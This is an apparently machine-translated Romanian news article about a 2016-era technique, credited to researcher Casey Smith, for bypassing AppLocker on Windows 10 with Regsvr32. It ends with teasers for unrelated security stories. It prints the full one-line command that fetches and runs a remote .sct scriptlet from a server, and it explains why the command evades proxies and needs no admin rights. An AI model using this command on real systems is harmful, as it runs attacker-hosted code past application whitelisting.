Regsvr32 poate fi utilizat pentru a ocoli aplicatorul pe Windows 10
Video: Applocker - запрет программ 2024
Un cercetător din Colorado care se numește, Casey Smith, a aflat că Regsvr32 poate fi folosit pentru a ocoli AppLocker pe Windows 10, iar aceasta este o problemă mare pentru utilizatorii de computere, în special pentru cei din mediul de afaceri.
AppLocker a fost introdus pentru prima dată în Windows 7 și Windows Server 2008 R2. Este conceput pentru a permite administratorilor să specifice ce grup sau utilizatori pot profita de unele sau toate aplicațiile bazate pe identitatea unică a fișierelor. Dacă sunteți o persoană care tinde să utilizeze AppLocker, atunci ar trebui să fie cunoscut faptul că poate fi folosit pentru a crea anumite reguli pentru a permite rularea aplicațiilor sau oprirea lor în piesele lor.
Pentru cei care nu pot fi conștienți, Regvr32 poate fi utilizat pentru a înregistra și anula înregistrarea DLL-urilor. Acesta nu este un instrument cu un singur clic, deoarece este un utilitar al liniei de comandă, așa că doar utilizatorii avansați de calculator ar trebui să caute să profite de ceea ce are de oferit.
Înțelegem că folosind această tehnică nu modifică registrul sistemului computerului, ceea ce face dificilă administrarea să știe dacă au fost făcute modificări.
regsvr32 / s / n / u /i:http://server/file.sct scrobj.dll
"Lucrul uimitor aici este că regsvr32 este deja cunoscut de proxy, folosește TLS, urmărește redirecționări etc. … Și … Ați ghicit un binar MS implicit semnat. Deci, tot ce trebuie să faci este să găzduiești fișierul tău.sct într-o locație pe care o controlezi ”, a scris Smith.
Tehnica de mai sus nu necesită privilegii administrative și nu modifică registrul. Mai mult, scripturile pot fi apelate atât prin HTTP, fie prin HTTPS. În acest moment, Microsoft nu a lansat o corecție pentru această mică problemă, astfel că singura opțiune în acest moment este să blochezi Regsvr32 prin Windows Firewall.
Destul de interesant, gigantul software nu a răspuns încă despre această problemă de securitate cu care se confruntă sistemul său de operare. Acum că este în aer liber, așteptăm să auzim ceva de la companie, împreună cu discuțiile despre un viitor patch.
Hackerii au folosit marginea pentru a ocoli stația de lucru vmware în perioada pwn2own 2017
Concursul din acest an Pwn2Own s-a încheiat după trei zile de hacking browsere și sisteme de operare. La final, browserul Microsoft Edge a apărut ca un ratat după ce nu a reușit să întrețină atacurile în timpul evenimentului. O echipă de la firma de securitate chineză Qihoo 360 a exploatat Edge și a legat împreună două defecte de securitate pentru a scăpa de un VMware ...
Acest bug de cuvânt microsoft vă poate ocoli protecția antimalware
Există o eroare critică care afectează Microsoft Office, care face literalmente coduri dăunătoare nedetectabile de soluțiile antimalware.
Contul de utilizator este dezactivat în prezent și nu poate fi utilizat [fix]
![Contul de utilizator este dezactivat în prezent și nu poate fi utilizat [fix]](https://img.desmoineshvaccompany.com/img/fix/748/user-account-is-currently-disabled.jpg "Contul de utilizator este dezactivat în prezent și nu poate fi utilizat [fix]")
Nu se poate autentifica din cauza Contului de utilizator este dezactivat în prezent și nu poate fi folosit eroare? Remediați-l modificând setările contului.
